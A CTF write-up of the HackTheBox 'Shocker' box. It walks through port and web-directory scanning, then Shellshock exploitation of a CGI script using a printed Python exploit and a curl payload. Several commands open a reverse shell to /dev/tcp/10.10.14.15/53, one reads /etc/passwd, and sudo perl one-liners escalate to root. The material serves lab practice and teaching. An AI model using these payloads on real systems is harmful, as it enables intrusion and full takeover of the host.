hackthebox – Shocker

Enumeration

I am using my own bash script to do a more efficient nmap scan.

Here’s the simple bash script:

#!/bin/bash

if [ $# -eq 0 ]; then
        echo "Usage: $0 <target_ip> <output_file>"
else
        ports=$(nmap -T4 --min-rate=1000 -p- $1|grep -e ^[0-9]|cut -d "/" -f 1| tr '\n' ','|sed 's/,$//')
        nmap -sC -sV -p $ports -vvv $1 -oN $2
fi

sh ~/tools/scan.sh 10.10.10.56 shocker1.txt running this script helps me get shocker1.txt which contains the scan result.

Nmap 7.91 scan initiated Tue Dec  8 23:55:22 2020 as: nmap -sC -sV -p 80,2222 -vvv -oN shocker1.txt 10.10.10.56
 Nmap scan report for 10.10.10.56
 Host is up, received syn-ack (0.0061s latency).
 Scanned at 2020-12-08 23:55:22 +08 for 6s
 PORT     STATE SERVICE REASON  VERSION
 80/tcp   open  http    syn-ack Apache httpd 2.4.18 ((Ubuntu))
 | http-methods: 
 |_  Supported Methods: GET HEAD POST OPTIONS
 |_http-server-header: Apache/2.4.18 (Ubuntu)
 |_http-title: Site doesn't have a title (text/html).
 2222/tcp open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey: 
 |   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
 | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD8ArTOHWzqhwcyAZWc2CmxfLmVVTwfLZf0zhCBREGCpS2WC3NhAKQ2zefCHCU8XTC8hY9ta5ocU+p7S52OGHlaG7HuA5Xlnihl1INNsMX7gpNcfQEYnyby+hjHWPLo4++fAyO/lB8NammyA13MzvJy8pxvB9gmCJhVPaFzG5yX6Ly8OIsvVDk+qVa5eLCIua1E7WGACUlmkEGljDvzOaBdogMQZ8TGBTqNZbShnFH1WsUxBtJNRtYfeeGjztKTQqqj4WD5atU8dqV/iwmTylpE7wdHZ+38ckuYL9dmUPLh4Li2ZgdY6XniVOBGthY5a2uJ2OFp2xe1WS9KvbYjJ/tH
 |   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
 | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPiFJd2F35NPKIQxKMHrgPzVzoNHOJtTtM+zlwVfxzvcXPFFuQrOL7X6Mi9YQF9QRVJpwtmV9KAtWltmk3qm4oc=
 |   256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
 |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC/RjKhT/2YPlCgFQLx+gOXhC6W3A3raTzjlXQMT8Msk
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 Read data files from: /usr/bin/../share/nmap
 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done at Tue Dec  8 23:55:28 2020 -- 1 IP address (1 host up) scanned in 6.87 seconds

The custom port tcp/2222 openssh version 7.2p2 is a rabbit hole which leads to no where it has a vulnerability of user enumeration by supplying a large password (default 50Kbytes of characters) for each user in user list, this is a waste of time and leads to no where.

Web directories enumeration

To be honest dirbuster is the best in terms of recursive enumeration but it is very slow, due to my VM limitation when dirbuster exceeds 50 threads errors will start, another choice is gobuster which is much quicker than dirbuster but it does not do recursive enumeration.

Dirbuster threads are for each extension search whereas gobuster’s threads go firing to the target web address with all extensions at the same time.

With dirbuster after an hour, an interesting result:

Files found with a 200 responce:

/cgi-bin/user.sh

With gobuster I need to manually do recursive scan myself:

gobuster dir -u 10.10.10.56 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 50 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/201000101 Firefox/52.0' -x .php,.txt,.sh,.htm,.html,.jsp

Then do gobuster dir -u 10.10.10.56/cgi-bin -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 50 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/201000101 Firefox/52.0' -x .php,.txt,.sh,.htm,.html,.jsp the entire process took 3mins.

A script wrapper is needed to use gobuster for recursive scans.

Shellshock exploit

I first came to know this when I did this machine, I use the test method from this post: https://www.surevine.com/shellshocked-a-quick-demo-of-how-easy-it-is-to-exploit/ to test, and the result proved to be positive to exploit.

I wrote myself a simple python script in order to do command easily instead of using curl.

import requests

# exploit based on https://www.surevine.com/shellshocked-a-quick-demo-of-how-easy-it-is-to-exploit/
base_header = """() { :; }; echo Content-Type: text/html; echo ;"""


base_path = input("Address of the shellshock vuln webapp: ")
vuln_file = input("File found under /cgi-bin/ which is executable: ")

url = f"http://{base_path}/cgi-bin/{vuln_file}"

print("Command example /bin/bash -i > /dev/tcp/192.168.10.1/53 0<&1 2>&1")
print("Another command example: /bin/cat /etc/passwd")


try:
    while True:
        cmd_string = input("Enter command string similar to the examples shown: ")
        response = requests.post(url, headers={"User-agent": f"{base_header}{cmd_string}"})
        print(response.text)
except KeyboardInterrupt as e:
    print("Bye!")

Get a foothold and get user’s flag

Since the exploit has been verified to be working, I shall set up a netcat listener to wait for a reverse connection.

The shocker machine has no netcat, hence I will need to pipe /bin/bash -i into /dev/tcp, with my script still having the session I type in /bin/bash -i > /dev/tcp/10.10.14.15/53 0<&1 2>&1

In curl is like this curl -v 10.10.10.56/cgi-bin/user.sh -H "custom:() { ignored; }; echo Content-Type: text/html; echo; /bin/bash -i > /dev/tcp/10.10.14.15/53 0<&1 2>&1"

Privilege escalation and obtain root.txt

I use a more redundant method which is to use POSIX library to promote user to root then execute bash as root.

sudo /usr/bin/perl -e 'use POSIX (setuid); POSIX::setuid(0); exec "/bin/bash";'

Since user can execute perl as root promoting user to root is not necessary hence use this sudo /usr/bin/perl -e 'exec "/bin/bash -i";' makes more sense.

References:

https://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/

https://www.surevine.com/shellshocked-a-quick-demo-of-how-easy-it-is-to-exploit/

https://github.com/francisck/shellshock-cgi/blob/master/shellshock_cgi.py